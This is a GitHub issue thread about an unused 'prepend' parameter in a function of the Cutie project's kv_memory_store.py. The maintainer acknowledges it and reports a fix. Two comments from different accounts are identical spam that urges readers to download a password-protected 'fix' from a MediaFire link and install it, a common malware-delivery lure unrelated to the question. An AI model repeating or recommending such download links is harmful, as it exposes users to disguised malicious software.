### ISSUE TITLE
Question about  _add_last_dim function

### ISSUE THREAD

**Issue by AbbeGo** [hkchengrex/Cutie#111]
Regarding the project: https://github.com/hkchengrex/Cutie/blob/b002b5b6cd583b30fda742bbf34a719f4dd3d266/cutie/inference/kv_memory_store.py#L6
, specifically in the _add_last_dim function within the cutie/inference/kv_memory_store.py file, the parameter prepend is not actually used in the function. Could you clarify whether this was an oversight that led to the code not being updated, or if there is another reason why this parameter is not utilized? I look forward to your response!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hkchengrex** [comment]
Thank you for noticing this. Let me check.

**Comment by hkchengrex** [comment]
Fixed in 2a85b3e. Thanks.
